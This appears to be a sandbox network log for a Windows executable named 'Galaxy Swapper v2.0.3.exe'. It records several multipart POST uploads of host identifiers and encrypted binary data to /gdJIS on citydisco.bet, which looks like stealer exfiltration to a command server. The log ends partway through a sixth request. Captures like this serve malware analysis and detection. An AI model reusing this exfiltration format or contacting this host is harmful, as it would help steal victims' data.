2	192.168.2.7	49683	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:50 UTC	280	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TWuBjE8tmLV34IKjp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15075 Host: citydisco.bet
2025-03-13 09:19:50 UTC	15075	OUT	Data Raw: 2d 2d 54 57 75 42 6a 45 38 74 6d 4c 56 33 34 49 4b 6a 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 0d 0a 2d 2d 54 57 75 42 6a 45 38 74 6d 4c 56 33 34 49 4b 6a 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 57 75 42 6a 45 38 74 6d 4c 56 33 34 49 4b 6a 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 Data Ascii: --TWuBjE8tmLV34IKjpContent-Disposition: form-data; name="uid"ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf--TWuBjE8tmLV34IKjpContent-Disposition: form-data; name="pid"2--TWuBjE8tmLV34IKjpContent-Disposition: form-data; name="hwid"
2025-03-13 09:19:50 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:19:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYYR4xl3lFe7S%2BieoQpr8O%2FXoOYrT675WOIza1pGQajjr8cR014ft64I7TXKxndNC3iao0qoYIk6z5Wfgl%2FPlAOj6oeSV0xlpBK3eyb%2BnIRq%2B7i41qiVsqRe1iJ2SfsP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa73b32cd88c72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31308&min_rtt=24315&rtt_var=11027&sent=14&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16013&delivery_rate=86652&cwnd=251&unsent_bytes=0&cid=dbcf121aa6441246&ts=901&x=0"
2025-03-13 09:19:50 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.13.135.219"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49684	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:52 UTC	272	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=phHh6U046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20360 Host: citydisco.bet
2025-03-13 09:19:52 UTC	15331	OUT	Data Raw: 2d 2d 70 68 48 68 36 55 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 0d 0a 2d 2d 70 68 48 68 36 55 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 70 68 48 68 36 55 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 36 31 35 46 46 46 35 38 43 30 42 45 44 44 34 42 30 43 Data Ascii: --phHh6U046Content-Disposition: form-data; name="uid"ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf--phHh6U046Content-Disposition: form-data; name="pid"3--phHh6U046Content-Disposition: form-data; name="hwid"43615FFF58C0BEDD4B0C
2025-03-13 09:19:52 UTC	5029	OUT	Data Raw: 20 bf 25 23 ba 38 4c 53 c2 a5 8e a3 3b 7c 20 35 07 a8 16 5d 10 11 ec c4 7e 43 b9 07 38 1b 68 29 5a d9 c8 2b e4 0e 33 a8 e0 08 cf 69 80 3a 6c 5f 67 d1 3c 11 77 c0 e5 f9 4b f0 47 15 e6 5d 1f b2 9e 10 34 81 fd 24 04 ba e2 2c 51 46 b6 7d 25 59 08 1a 87 8a 73 2f ed ae fd 87 f2 5f b3 a4 ed 40 7d 78 14 c7 4a d6 27 72 00 28 75 b7 83 22 18 01 73 52 fe 6c cf 4f 8c 0b c5 bc 80 18 41 a7 69 87 cf 95 1e 43 70 54 26 19 e5 2f 43 65 68 ca e1 0f 3d 53 a7 4c f5 7c 2e 6d 3c 99 f4 0c 00 e0 84 00 8e ea 99 35 f1 f3 11 c6 8a d2 2f 36 5f 08 73 f6 d2 7b 1c e5 20 0b 9e 75 3c 14 8f 0f 49 9b fc 5d 4a 6f 11 71 27 45 96 63 ed 04 c3 48 cf 7c 7d 66 0b 2c eb b3 0b 27 2b 4c 00 21 9a a2 57 5e 3e 4c ff 72 28 e3 aa f1 de 5b 2e 1e 62 e5 38 07 82 c0 eb 9c 2c 99 44 47 ed 58 ec 6d 14 87 a2 7b de Data Ascii: %#8LS;\| 5]~C8h)Z+3i:l_g<wKG]4$,QF}%Ys/_@}xJ'r(u"sRlOAiCpT&/Ceh=SL\|.m<5/6_s{ u<I]Joq'EcH\|}f,'+L!W^>Lr([.b8,DGXm{
2025-03-13 09:19:53 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:19:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7uGTNaZKd3zSfPoIz4Wdr5OkTBdJCE4kf05NbJ1CgqKnlCAvXV0osPhdn7D1JJ0%2B6222x4qp77jI%2B6SnysHDR2MieEYrF4BfGrf7SJ4WNpHR3Vv9I%2B8SVekdq9gMqCRx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa73c42f754f0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28032&min_rtt=23754&rtt_var=14096&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21312&delivery_rate=68937&cwnd=223&unsent_bytes=0&cid=5664ff03939fb4c6&ts=986&x=0"
2025-03-13 09:19:53 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.13.135.219"}}
2025-03-13 09:19:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49685	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:56 UTC	271	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=c20zDNl9W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2483 Host: citydisco.bet
2025-03-13 09:19:56 UTC	2483	OUT	Data Raw: 2d 2d 63 32 30 7a 44 4e 6c 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 0d 0a 2d 2d 63 32 30 7a 44 4e 6c 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 63 32 30 7a 44 4e 6c 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 36 31 35 46 46 46 35 38 43 30 42 45 44 44 34 42 30 43 Data Ascii: --c20zDNl9WContent-Disposition: form-data; name="uid"ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf--c20zDNl9WContent-Disposition: form-data; name="pid"1--c20zDNl9WContent-Disposition: form-data; name="hwid"43615FFF58C0BEDD4B0C
2025-03-13 09:19:56 UTC	809	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:19:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ozanZ%2FEDIaBIwqRHR0W%2BGfwDCPtL9R3%2Ba4M9dIr1GVTdDDJmZWaMGP%2BmSOPy34T6W6isn7WZ5dK4JiOTJ6WPFDRmTf5IHjV0uibEUtGMCaW1vZz2uHpL79C5FOWtxLTC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa73d979c728c9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21143&min_rtt=19982&rtt_var=7633&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2830&recv_bytes=3390&delivery_rate=116100&cwnd=246&unsent_bytes=0&cid=cfc5fcd486667937&ts=867&x=0"
2025-03-13 09:19:56 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.13.135.219"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49687	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:59 UTC	278	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5yUxqJbXalj8yn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 567727 Host: citydisco.bet
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: 2d 2d 35 79 55 78 71 4a 62 58 61 6c 6a 38 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 0d 0a 2d 2d 35 79 55 78 71 4a 62 58 61 6c 6a 38 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 79 55 78 71 4a 62 58 61 6c 6a 38 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 36 31 35 Data Ascii: --5yUxqJbXalj8ynContent-Disposition: form-data; name="uid"ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf--5yUxqJbXalj8ynContent-Disposition: form-data; name="pid"1--5yUxqJbXalj8ynContent-Disposition: form-data; name="hwid"43615
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: 90 ce 64 37 53 89 11 10 93 4f 26 b3 79 88 f6 3a 67 20 b9 11 6c ea 06 2a 6b 21 11 e2 d1 9a 9e e4 ea 3f 6d aa 38 90 a3 c1 55 51 21 a7 ab 64 7a 15 44 15 de af f4 bc 0d c6 a5 e5 bd be 9d 60 9a 5b 34 bf d4 1e b8 24 1e 52 20 61 50 b1 97 fb bd 37 a1 6f 03 3a bc a6 2e 07 db 1e 9b 28 7b 30 79 a8 52 da 46 70 d4 24 d5 ec 61 49 82 4e 92 70 b3 41 39 3f e5 51 15 1b 14 d7 9f e0 90 d2 6e ca b3 34 f2 f4 30 f9 cb fb 06 5e ef 6c 76 4a 64 07 c0 d3 3e dc 9a 2c b7 a3 8d d8 76 0c 46 53 a9 20 bf 01 83 e6 b4 65 86 12 2f 09 04 0d c5 59 fb e1 1e 5f ab 63 e5 27 ed 53 bf 7d fc a6 9b ef b8 9b 98 05 81 ef 04 d3 a6 39 05 7e 89 51 34 77 a1 94 b1 29 6f ee d0 b1 19 e6 fc 54 86 74 b3 df be 1b 4e 46 ac 31 a1 a7 1b 30 d5 ce 58 76 66 bc 0e c0 fa 73 9f 19 6f f6 5b c2 fc f3 c9 de da 63 50 55 04 Data Ascii: d7SO&y:g l*k!?m8UQ!dzD`[4$R aP7o:.({0yRFp$aINpA9?Qn40^lvJd>,vFS e/Y_c'S}9~Q4w)oTtNF10Xvfso[cPU
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: c7 f6 50 99 e4 32 fc cb c3 25 d8 1f c6 d7 38 7d ab 7c 69 09 4a fd 8e 8d e0 72 7a fc c0 b9 32 8d f6 4c 07 59 2f eb 7b 29 e4 45 10 a9 f8 e9 4d 24 dd 04 7d 79 2d 17 5c de 3a 45 70 40 0a 8b 17 19 86 22 de fc aa 99 b1 c5 b7 b3 10 85 1f 6e 75 f3 45 f3 3f 12 b5 d2 8f cf e4 f5 5a 78 a1 94 d1 71 d8 dc 39 fb 35 84 3f 4e d5 d4 6d 59 64 b3 19 a0 4f 71 31 20 c2 43 97 03 bd f6 f0 73 fc b5 81 10 a2 98 28 1f b0 b3 f8 d6 b2 42 4d fd 8f 4c 58 45 a7 e2 b1 88 38 fa a6 05 f0 a2 60 88 65 b7 83 b9 4e 60 52 38 87 6f cd 84 e3 43 ba ff 4b 97 87 7d 8d 4a f2 3e 99 51 51 44 5f 7e 1e 6c b5 75 1a 3b a6 3b 55 86 7a a7 a7 6b d3 d4 93 c3 a0 f6 47 23 ea ee cb 3a 51 76 07 e9 f3 8b a0 1e 1b f4 ca ab 22 dd e1 b7 07 83 d1 3b 5a 06 d2 56 94 c7 a0 0f a5 ab 54 01 fe 47 ea 08 57 fe 3b 9d 17 cf 20 Data Ascii: P2%8}\|iJrz2LY/{)EM$}y-\:Ep@"nuE?Zxq95?NmYdOq1 Cs(BMLXE8`eN`R8oCK}J>QQD_~lu;;UzkG#:Qv";ZVTGW;
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: 60 a7 bd 05 8a f0 e6 47 6b 99 44 ff f2 89 68 d0 cf ae ef 19 6f 30 df 4c 04 ad 80 42 2a 99 f8 19 20 a7 94 ad 99 41 f3 a8 10 7f 10 db 4f e6 ac c0 3d dd db 50 2a 1e d3 34 66 85 1b 80 bf fd f2 91 bc 07 08 33 f5 cd 95 8e 33 24 a3 c5 e7 5a 0f 42 bf 03 74 9c aa aa 99 84 82 76 1a a6 87 3f 13 8f 29 73 c1 0a a3 dd e2 17 ea 68 5d 60 3d e8 b0 a8 01 b9 c7 f5 56 48 a6 ba c8 95 5f ca d9 db 38 de a0 ed 76 67 19 ce 90 db c4 ce 5f 60 b5 e2 a2 11 df ed ae 0f 4b 4c 33 49 95 38 90 fa a6 c8 97 e8 b7 3b e3 3b 4a 23 f6 d7 d5 5e 18 0f df 97 ed 8c 70 6e 21 89 ee 75 ad a1 df 6b 94 21 c2 a7 ef 4d 73 20 a6 d0 41 44 29 aa d4 ed f6 d2 90 b1 a7 84 4c c1 57 52 11 d6 07 d8 32 02 ed 08 8d 0f df 06 cf 53 d4 33 fa 09 ca 68 b5 c1 f5 72 14 7a 22 4b 31 82 9b 48 d8 46 1b 66 90 65 1f e9 91 e6 10 Data Ascii: `GkDho0LB* AO=P*4f33$ZBtv?)sh]`=VH_8vg_`KL3I8;;J#^pn!uk!Ms AD)LWR2S3hrz"K1HFfe
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: 86 dc 30 e5 50 07 b6 1a 6e cf e6 dc d8 e5 b9 6e 5f 3b ba 86 f5 db 90 c7 c4 69 d8 28 3b 69 d6 a8 22 3a 75 8c 62 c8 39 13 c5 2a 17 ed 7d 28 24 92 1b 7f 5b f5 f8 04 3d a4 45 1b 82 fe 56 58 5a 2f 04 69 67 f5 1c 07 8f de 60 66 80 5d d4 76 48 c7 b2 5b cc 40 a2 ec ee d3 c5 df 8b 56 96 ab 63 aa 8d af 5b b2 1d 7d ad 2e c3 b5 61 da d4 14 fd 6a a7 ec 18 8e 76 37 47 77 0b 66 f0 7b 11 d3 8c 29 59 4d 19 6e 43 5f 94 63 c4 de a2 ff 04 7e 1a d5 20 b4 51 b6 3a 9d 0a 20 46 47 2f d9 f2 d9 f9 7e c2 c1 be 6f 2e 35 1a 3b b7 73 b4 f7 09 4c cc 0c 70 d3 53 05 9d 81 01 2b 0f 62 62 02 f7 01 1c d9 af 87 8b 06 cb 63 d6 b7 a2 7f f4 b1 be 0d a7 cd 20 a1 a5 fb 0d be cc f4 6f e9 f9 98 8a 6e 48 2b 7a 40 90 60 44 d6 27 14 99 dd c0 dd 9d c2 1d a8 9d a1 b2 59 b4 3e 18 ae 7f 5d 80 02 0a c6 c4 Data Ascii: 0Pnn_;i(;i":ub9*}($[=EVXZ/ig`f]vH[@Vc[}.ajv7Gwf{)YMnC_c~ Q: FG/~o.5;sLpS+bbc onH+z@`D'Y>]
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: 75 f1 da cb 60 39 ec 78 2e f5 89 c0 1c e8 2f 5e 76 e9 2c 7f d1 6d c9 e3 4b 0e 34 fa 33 7e 3f 58 41 a1 d0 b4 9d 4f 85 72 b9 17 2b 50 0e 35 74 da 03 7e 71 b6 0a dd 2f db 60 7c da 5a df 86 36 f5 d3 84 9a 47 10 7c 83 71 97 a6 5d a7 61 b9 f8 02 0b 79 10 97 43 bc e9 6a e6 e4 bd 7a 49 35 e3 86 32 1c d9 d1 ff ad 37 72 1e 4f 81 00 6f 8c 93 47 f3 7e 3e f4 82 b2 8d da 74 2e 64 cf d4 bb 73 23 86 75 54 1e 81 45 61 16 09 9b 98 0c c2 cb 0c ab c3 b8 98 08 cb 8b 8c 46 86 1e ae 20 a6 3c 4a 3d a0 80 a8 40 72 91 2e bb 22 48 e0 53 25 c2 33 6d 86 66 02 8e ef 5d d9 87 49 9e 03 66 d8 e0 90 11 0d 21 aa a6 59 18 1e de 03 f9 e6 f3 0e 3e c3 5c d2 a2 2c fd 76 07 52 6f a9 44 ba 53 fd d7 76 ac 05 80 c5 ad 58 a9 f3 5a 38 3e dd a5 e7 0e 6f 9a b2 6d f9 6d 0d 40 d6 64 03 a2 05 72 9a ad 55 Data Ascii: u`9x./^v,mK43~?XAOr+P5t~q/`\|Z6G\|q]ayCjzI527rOoG~>t.ds#uTEaF <J=@r."HS%3mf]If!Y>\,vRoDSvXZ8>omm@drU
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: f2 04 f2 92 01 e7 a8 ed 01 e3 80 36 2b 46 db 73 9f 98 92 0e cb 57 92 28 6a d0 38 9f 77 46 43 de 92 6f ac 22 ef 38 fa 93 76 c7 1e 40 b6 6d 41 0c a0 45 2e 59 30 b5 d6 b3 dc 98 59 2a c1 9c 5d 50 cd f6 d3 24 6e c0 19 53 b8 47 67 79 b9 9c 22 71 1c 88 28 94 bb a3 67 7b 57 7b 7a 22 72 ed d8 3d df 3d 7b e0 1c dd d7 fb 2e db fb 85 4f c0 87 5f 51 47 05 e0 e7 d5 81 58 74 ca 0c dc 3c 32 98 35 57 31 1d 27 b0 cb 9d 26 5a 49 a8 15 c8 95 30 08 09 5e ef 9f bd 3d 02 04 99 d7 b9 d0 8b bf df bb db af 0c 1e 77 e4 c8 d3 95 95 70 d5 27 d7 dd 90 2e ec 18 4a a0 ad 4d ec fa c6 cd 79 67 ff 12 54 1d f6 d3 0d 46 c0 f1 1d 15 7a b3 5e a7 fc 98 1a ae a2 3d 09 3f 8a 79 b1 62 64 f6 d2 cc 58 a4 2d 93 b4 04 35 8a 1c dc ce ee 98 45 e9 d6 ea 85 6b 5b ff e1 55 15 a1 a2 b6 80 b3 a4 c5 4d 35 73 Data Ascii: 6+FsW(j8wFCo"8v@mAE.Y0Y*]P$nSGgy"q(g{W{z"r=={.O_QGXt<25W1'&ZI0^=wp'.JMygTFz^=?ybdX-5Ek[UM5s
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: d8 69 90 e9 e9 ae 1d 5a 03 57 61 e7 5e ad 60 34 7a 1c 39 3e 6e d9 92 a5 62 d6 82 68 4d 50 6d ff 36 21 33 aa 97 ff b9 77 1f fb 6b 3a a7 da 8d ce 34 94 97 35 66 65 4b f3 78 d2 bd 63 61 dd eb f8 71 84 97 a6 bb 85 ab 6b f8 d9 f7 8c 3c b5 70 bd 33 07 a2 5a ce 94 88 03 f4 fc 5b 54 1c aa 50 d4 bb df 47 49 8f 13 87 24 48 b7 bc b8 be 8d 82 13 30 ef e4 31 8c 09 63 cf d7 05 59 ac 1a 38 f0 26 d3 19 de 28 8e 83 8c cb 0d 8c d8 0a 88 f2 9f 83 d2 54 ee cf 2c c3 ec 9d b7 96 95 3e 18 df 22 19 3b 41 4b 3f ab 0f 21 26 56 72 e8 68 6d 61 c3 25 d5 92 42 3a 02 7e 56 8d 33 86 a1 93 11 3b f5 e6 4f ad 8c dd 4d 33 0a c2 cc e3 80 1a e5 b7 61 1c 32 8e 66 af d5 ff 6d bb 9f 0f 50 ee 1b a3 f9 0b 85 4b fb 64 76 ab 4d 40 20 2c dc a7 b7 20 1a b1 2e cd 97 1f a4 fc 5a 05 59 cd 2d 31 3a 14 a5 Data Ascii: iZWa^`4z9>nbhMPm6!3wk:45feKxcaqk<p3Z[TPGI$H01cY8&(T,>";AK?!&Vrhma%B:~V3;OM3a2fmPKdvM@ , .ZY-1:
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: b6 d4 29 a5 64 8b f0 6b 4e be 08 87 c7 6d 64 02 75 e3 23 e8 1f 23 45 57 b5 61 03 b8 ae 5b a9 04 b5 22 cb f2 8a 59 5a 5f 3a bf 6c cb 0a 1e 57 7d 67 a1 82 0f d0 64 25 07 79 af 69 c8 cd 1b be c0 22 e1 4e 8b 41 99 48 17 95 a3 a8 ac d0 04 46 d6 4d 94 d1 7b 03 6c 16 d5 7f 2f d8 59 89 e6 84 9b 3e 81 0b 13 bb 4a 82 bf 4b 38 9c 26 a3 ea 0b 95 ad 03 9f 5d 13 b4 71 31 5b fe d1 4e 35 9e c8 43 09 41 55 b8 fd 66 ca 46 61 a4 71 6f 03 e5 35 18 b9 86 b4 ab 8a b9 2a 45 f9 11 c3 db 70 58 ce e6 69 55 95 00 ec 89 ae ff 92 a3 9b 16 5c e9 ca ba cc 4f 9e 42 a9 4e a3 70 eb db 60 84 d3 32 ef b3 0c 26 7e 65 fe 3e 9f 38 3a 13 96 0c 5d 11 80 e9 c0 b1 1e c6 33 27 dc 05 55 ee 8a 17 43 12 6c 88 37 b0 8d 72 60 b1 e6 e5 91 19 bc 62 1b 6a 77 ac 89 23 f0 87 9a 7f b0 cf 56 78 12 67 99 84 8d Data Ascii: )dkNmdu##EWa["YZ_:lW}gd%yi"NAHFM{l/Y>JK8&]q1[N5CAUfFaqo5*EpXiU\OBNp`2&~e>8:]3'UCl7r`bjw#Vxg
2025-03-13 09:19:59 UTC	15331	OUT	Data Raw: d7 7a 2a 70 f7 55 f3 42 4b 00 81 21 ca 8c e0 7b bd 13 c9 b2 a2 50 f2 4d 72 24 10 6d 83 a3 11 58 3c c4 de cd 56 25 85 f8 57 f9 57 f6 de 41 7d 68 dd 73 2e 8e 87 51 c9 42 e8 00 7e 99 ff 91 6f c6 0d 7c 0c 83 4a c6 ff 40 e6 3f b5 f3 c1 69 02 b7 33 76 ed da ab c2 5a e4 10 09 5c fe 32 c2 2e 7e 90 51 28 de eb e3 af 00 4b 45 49 0b 65 0d b1 eb 49 6d 5f 1f f3 3a 4b 96 bc e2 55 fc 85 7d 75 19 dd e7 5b 4d 43 9c e0 00 8b b0 4c 44 6b 86 8c 15 8e ae 62 46 14 f4 3a d2 ac cc 2b 89 7e 8a 23 20 c7 b9 22 e3 f8 e3 e8 5c 3c d8 6e 3b ba 74 56 46 6a b4 0a 1e d6 9d e0 79 59 3c 8c be b7 46 38 f3 fa 02 a1 42 93 12 f3 27 af a0 5a 02 61 6c c1 6c 4c 53 1c 1b bb 2d 4d b0 a6 d9 bd 66 df 24 79 b9 61 97 67 c5 e3 1a 86 c3 71 35 22 52 69 74 07 ba 42 d9 08 eb 16 36 cb a5 2a 93 7a c8 e8 85 b6 Data Ascii: zpUBK!{PMr$mX<V%WWA}hs.QB~o\|J@?i3vZ\2.~Q(KEIeIm_:KU}u[MCLDkbF:+~# "\<n;tVFjyY<F8B'ZallLS-Mf$yagq5"RitB6z
2025-03-13 09:20:02 UTC	820	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:20:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDejN2buB%2Blor49w%2BFTZ3gPF5156WHqGzAO8HIog4v2qgVlesz8EBs8IfVqgelZXaDe1wQFW8CuIk7Ja%2FUpHx4KTdO7PLzjRl6dv%2BkzNw8%2F4wnqxFZt%2FTBHBoy3gZ3Qu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa73ece8d14229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23244&min_rtt=20245&rtt_var=10893&sent=174&recv=426&lost=0&retrans=0&sent_bytes=2830&recv_bytes=570269&delivery_rate=87635&cwnd=244&unsent_bytes=0&cid=bee447e32f3c16b9&ts=3005&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49692	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:20:04 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 99 Host: citydisco.bet
